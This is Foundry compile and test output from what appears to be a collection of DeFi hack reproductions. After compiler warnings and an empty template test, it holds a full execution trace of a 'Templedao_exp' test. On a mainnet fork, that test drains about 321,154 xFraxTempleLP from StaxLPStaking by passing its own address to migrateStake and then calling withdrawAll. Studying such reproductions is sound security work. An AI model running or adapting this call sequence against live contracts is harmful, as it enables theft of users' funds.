Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.24s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 875.49ms (1.81ms CPU time)

Ran 1 test for src/test/2022-10/Templedao_exp.sol:ContractTest
[PASS] testExploit() (gas: 145515)
Logs:
  [Start] Attacker xFraxTempleLP balance before exploit: 0.000000000000000000
  [End] Attacker xFraxTempleLP balance after exploit: 321154.865567124596801893

Traces:
  [5098] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 15725066 [1.572e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(xFraxTempleLP: [0xBcB8b7FC9197fEDa75C101fA69d3211b5a30dCD9], "xFraxTempleLP")
    │   └─ ← [Return]
    ├─ [0] VM::label(StaxLPStaking: [0xd2869042E12a3506100af1D192b5b04D65137941], "StaxLPStaking")
    │   └─ ← [Return]
    └─ ← [Stop]

  [173015] ContractTest::testExploit()
    ├─ [2624] xFraxTempleLP::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "[Start] Attacker xFraxTempleLP balance before exploit", val: 0, decimals: 18)
    ├─ [2624] xFraxTempleLP::balanceOf(StaxLPStaking: [0xd2869042E12a3506100af1D192b5b04D65137941]) [staticcall]
    │   └─ ← [Return] 321154865567124596801893 [3.211e23]
    ├─ [108940] StaxLPStaking::migrateStake(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 321154865567124596801893 [3.211e23])
    │   ├─ [642] ContractTest::migrateWithdraw(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 321154865567124596801893 [3.211e23])
    │   │   └─ ← [Stop]
    │   ├─ emit Staked(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 321154865567124596801893 [3.211e23])
    │   ├─  storage changes:
    │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0 → 0x000000000000000000000000000000000000000000004401d713e9e597a14165
    │   │   @ 0x3735b345c708083260609f732987da4dc3ab349b787153696897e4b7efcb4e8e: 0 → 0x00000000000000000000000000000000000000000000000000f21e88d5ce31fb
    │   │   @ 0x83bb8e373621c3d10103e10cb276f584bd1229dda5c2b0de3a38a3723fcf0110: 0x000000000000000000000000000000000000000004ff3a60df17b200634075c7 → 0x00000000000000000000000000000000000000000512ecc1ce69af0063456ac7
    │   │   @ 0x03772551ffb25c339473ecd28ad325f93a45ddaca6321611d1e904640aae7ccd: 0 → 0x000000000000000000000000000000000000000000000000000512ecc1ce69af
    │   │   @ 0x76937ff8efc1d1b30f4883b6b2ffd3ecd3ca9535384c68744e61756ba4f196c7: 0x0000000000000000000000000000000000000000ee27e805e468b900634075c7 → 0x0000000000000000000000000000000000000000f21e88d5ce31fb0063456ac7
    │   │   @ 3: 0x000000000000000000000000000000000000000000004401d713e9e597a14165 → 0x000000000000000000000000000000000000000000008803ae27d3cb2f4282ca
    │   └─ ← [Stop]
    ├─ [44029] StaxLPStaking::withdrawAll(false)
    │   ├─ [25870] xFraxTempleLP::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 321154865567124596801893 [3.211e23])
    │   │   ├─ emit Transfer(from: StaxLPStaking: [0xd2869042E12a3506100af1D192b5b04D65137941], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 321154865567124596801893 [3.211e23])
    │   │   ├─  storage changes:
    │   │   │   @ 0x81b993888c28609d76ed738fb097f840ac74485fd63a15fb9c3d14a0d6826e12: 0x000000000000000000000000000000000000000000004401d713e9e597a14165 → 0
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000004401d713e9e597a14165
    │   │   └─ ← [Return] true
    │   ├─  emit topic 0: 0xd1c19fbcd4551a5edfb66d43d2e337c04837afda3482b42bdf569a8fccdae5fb
    │   │        topic 1: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │           data: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000004401d713e9e597a14165
    │   ├─  storage changes:
    │   │   @ 3: 0x000000000000000000000000000000000000000000008803ae27d3cb2f4282ca → 0x000000000000000000000000000000000000000000004401d713e9e597a14165
    │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0x000000000000000000000000000000000000000000004401d713e9e597a14165 → 0
    │   └─ ← [Stop]
    ├─ [624] xFraxTempleLP::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 321154865567124596801893 [3.211e23]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker xFraxTempleLP balance after exploit", val: 321154865567124596801893 [3.211e23], decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 5.89s (4.37s CPU time)

Ran 2 test suites in 6.88s (6.77s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
